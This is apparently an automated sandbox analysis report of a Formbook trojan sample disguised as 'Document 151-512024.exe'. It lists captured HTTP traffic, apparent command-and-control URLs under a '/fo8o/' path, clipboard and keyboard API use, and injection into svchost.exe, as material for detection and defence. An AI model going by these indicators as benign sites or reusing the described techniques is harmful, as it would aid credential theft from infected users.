            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:51:06 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:51:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: 9a6dc7db-0394-4880-b691-abed2da91c16-1715158272server-timing: processing;dur=32content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a6dc7db-0394-4880-b691-abed2da91c16-1715158272x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a6dc7db-0394-4880-b691-abed2da91c16-1715158272x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNZurGMiBUjjH65nycq3vVVh8%2FaiQ%2BgU2QsjucWpF7EOlaV%2BJT8Op%2FVeQhkp6bXwWH9xT1Elgyj%2BTKfcIiXwaXnO1Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:51:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: 2199823c-e987-4621-a11f-a61bbf44d90c-1715158274server-timing: processing;dur=16content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2199823c-e987-4621-a11f-a61bbf44d90c-1715158274x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2199823c-e987-4621-a11f-a61bbf44d90c-1715158274x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J67Qfkpny3Chmi2KspWsNPn9cvW3xVSbLp5U7FZUGZ4YTNkGZkCs%2Fi%2BlR0Dmw7MYTj1dU2jItIq69ISa5knhjWygjO0FLP0Data Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 08:51:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: 8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277server-timing: processing;dur=14content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rPR7RGy7y0bvam6EnVKHqf1Xt1cFB5B79uPSZxcF4K%2B7HxOfcDKyxBWWzw4llHMJ36NBLAlqjS%2Bk%2BHCrxwN0RBzUDESnBData Raw: Data Ascii:
            Source: dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3692339141.0000000004BCF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3692339141.0000000004BCF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 0000000A.00000002.3692885046.00000000048D2000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003632000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 0000000A.00000002.3692885046.00000000048D2000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003632000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004BF6000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003956000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://donnavariedades.com/fo8o?FBEd=l
            Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 0000000A.00000003.1579551775.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3689176760.0000000002FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 0000000A.00000003.1579551775.0000000002FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 0000000A.00000003.1578336856.0000000007DEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 0000000A.00000002.3692885046.000000000428A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002FEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi
            Source: netbtugc.exe, 0000000A.00000002.3692885046.000000000428A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002FEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://musee.mobi/vivaldi/fo8o/?FBEd=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHA
            Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004D88000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003AE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: netbtugc.exe, 0000000A.00000002.3694681705.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 0000000A.00000002.3692885046.0000000004F1A000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000003C7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?FBEd=mxnR
            Source: netbtugc.exe, 0000000A.00000002.3692885046.00000000040F8000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002E58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ
            Source: netbtugc.exe, 0000000A.00000002.3692885046.00000000040F8000.00000004.10000000.00040000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.0000000002E58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&amp;FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta
            Source: netbtugc.exe, 0000000A.00000002.3692885046.00000000045AE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3694569550.00000000063C0000.00000004.00000800.00020000.00000000.sdmp, dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000330E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3690396328.000000000330E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009BEAFF
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009BED6A
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009BEAFF
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009AAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_009AAA57
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_009D9576

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Document 151-512024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Document 151-512024.exe, 00000000.00000000.1214181249.0000000000A02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d7e3c898-6
            Source: Document 151-512024.exe, 00000000.00000000.1214181249.0000000000A02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b0f267b4-2
            Source: Document 151-512024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_869cadb2-2
            Source: Document 151-512024.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_bbaa9491-6
            Source: initial sampleStatic PE information: Filename: Document 151-512024.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B60 NtClose,LdrInitializeThunk,2_2_03372B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03372DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03372C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,2_2_033735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374340 NtSetContextThread,2_2_03374340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03374650 NtSuspendThread,2_2_03374650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BA0 NtEnumerateValueKey,2_2_03372BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372B80 NtQueryInformationFile,2_2_03372B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BF0 NtAllocateVirtualMemory,2_2_03372BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372BE0 NtQueryValueKey,2_2_03372BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AB0 NtWaitForSingleObject,2_2_03372AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AF0 NtWriteFile,2_2_03372AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372AD0 NtReadFile,2_2_03372AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F30 NtCreateSection,2_2_03372F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F60 NtCreateProcessEx,2_2_03372F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FB0 NtResumeThread,2_2_03372FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FA0 NtQuerySection,2_2_03372FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372F90 NtProtectVirtualMemory,2_2_03372F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372FE0 NtCreateFile,2_2_03372FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E30 NtWriteVirtualMemory,2_2_03372E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EA0 NtAdjustPrivilegesToken,2_2_03372EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372E80 NtReadVirtualMemory,2_2_03372E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372EE0 NtQueueApcThread,2_2_03372EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D30 NtUnmapViewOfSection,2_2_03372D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D10 NtMapViewOfSection,2_2_03372D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372D00 NtSetInformationFile,2_2_03372D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DB0 NtEnumerateKey,2_2_03372DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372DD0 NtDelayExecution,2_2_03372DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C00 NtQueryInformationProcess,2_2_03372C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372C60 NtCreateKey,2_2_03372C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03372CA0 NtQueryInformationToken,2_2_03372CA0
